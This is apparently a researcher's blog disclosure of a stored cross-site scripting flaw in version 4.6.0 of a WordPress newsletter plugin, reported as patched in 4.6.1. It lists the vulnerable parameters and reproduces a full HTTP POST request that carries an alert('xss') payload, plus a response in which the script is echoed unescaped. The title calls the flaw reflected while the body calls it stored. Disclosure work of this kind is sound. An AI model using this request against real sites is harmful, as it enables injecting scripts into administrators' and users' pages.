Home > Uncategorized > XSS issue in WordPress Plugin: Newsletter Version 4.6.0

XSS issue in WordPress Plugin: Newsletter Version 4.6.0

I recently reported a Cross-Site Scripting (XSS), Reflected issue for WordPress Plugin: Newsletter 4.6.0 https://wordpress.org/plugins/newsletter/ to plugins@wordpress.org.

 

The developers have since released a patch for the plugin (version 4.6.1) (see https://wordpress.org/plugins/newsletter/changelog/ for more information).

1. Stored Cross-Site Scripting (XSS)
Authenticated administrators can inject html/js code (there is no CSRF protection).
Method: POST
Vulnerable Parameter(s): 
options[list_1]
options[list_2]
options[list_3]
options[list_4]
options[list_5]
options[list_6]
options[list_7]
options[list_8]
options[list_9]
options[list_10]
options[list_11]
options[list_12]
options[list_13]
options[list_14]
options[list_15]
options[list_16]
options[list_17]
options[list_18]
options[list_19]
options[list_20]
Example Attack:
Request:
POST /wordpress/wp-admin/admin.php?page=newsletter_subscription_lists HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1762
act=save&btn=&_wpnonce=7cad5407b5&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dnewsletter_subscription_lists&options%5Blist_1%5D=test&options%5Blist_1_status%5D=1&options%5Blist_1_checked%5D=1&options%5Blist_2%5D=&options%5Blist_2_status%5D=0&options%5Blist_2_checked%5D=0&options%5Blist_3%5D=&options%5Blist_3_status%5D=0&options%5Blist_3_checked%5D=0&options%5Blist_4%5D=&options%5Blist_4_status%5D=0&options%5Blist_4_checked%5D=0&options%5Blist_5%5D=&options%5Blist_5_status%5D=0&options%5Blist_5_checked%5D=0&options%5Blist_6%5D=&options%5Blist_6_status%5D=0&options%5Blist_6_checked%5D=0&options%5Blist_7%5D=bi1x5alert(‘xss’)gjoce&options%5Blist_7_status%5D=0&options%5Blist_7_checked%5D=0&options%5Blist_8%5D=&options%5Blist_8_status%5D=0&options%5Blist_8_checked%5D=0&options%5Blist_9%5D=&options%5Blist_9_status%5D=0&options%5Blist_9_checked%5D=0&options%5Blist_10%5D=&options%5Blist_10_status%5D=0&options%5Blist_10_checked%5D=0&options%5Blist_11%5D=&options%5Blist_11_status%5D=0&options%5Blist_11_checked%5D=0&options%5Blist_12%5D=&options%5Blist_12_status%5D=0&options%5Blist_12_checked%5D=0&options%5Blist_13%5D=&options%5Blist_13_status%5D=0&options%5Blist_13_checked%5D=0&options%5Blist_14%5D=&options%5Blist_14_status%5D=0&options%5Blist_14_checked%5D=0&options%5Blist_15%5D=&options%5Blist_15_status%5D=0&options%5Blist_15_checked%5D=0&options%5Blist_16%5D=&options%5Blist_16_status%5D=0&options%5Blist_16_checked%5D=0&options%5Blist_17%5D=&options%5Blist_17_status%5D=0&options%5Blist_17_checked%5D=0&options%5Blist_18%5D=&options%5Blist_18_status%5D=0&options%5Blist_18_checked%5D=0&options%5Blist_19%5D=&options%5Blist_19_status%5D=0&options%5Blist_19_checked%5D=0&options%5Blist_20%5D=&options%5Blist_20_status%5D=0&options%5Blist_20_checked%5D=0
Response:
HTTP/1.1 200 OK
Date: Wed, 28 Sep 2016 17:40:12 GMT
Server: Apache
X-Powered-By: PHP/7.0.10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102536
Request:
GET /wordpress/wp-admin/admin.php?page=newsletter_users_massive HTTP/1.1
Host: localhost:8888
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
Response:
HTTP/1.1 200 OK
Date: Wed, 28 Sep 2016 17:40:37 GMT
Server: Apache
X-Powered-By: PHP/7.0.10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
X-UA-Compatible: IE=edge
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98989
For preference <select id=”options-list” name=”options[list]”><option value=”1″>(1) test</option><option value=”2″>(2) </option><option value=”3″>(3) </option><option value=”4″>(4) </option><option value=”5″>(5) </option><option value=”6″>(6) </option><option value=”7″>(7) bi1x5alert(‘xss’)gjoce</option><option value=”8″>(8)
unnamed
Advertisements
Categories: Uncategorized
  1. No comments yet.
  1. No trackbacks yet.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: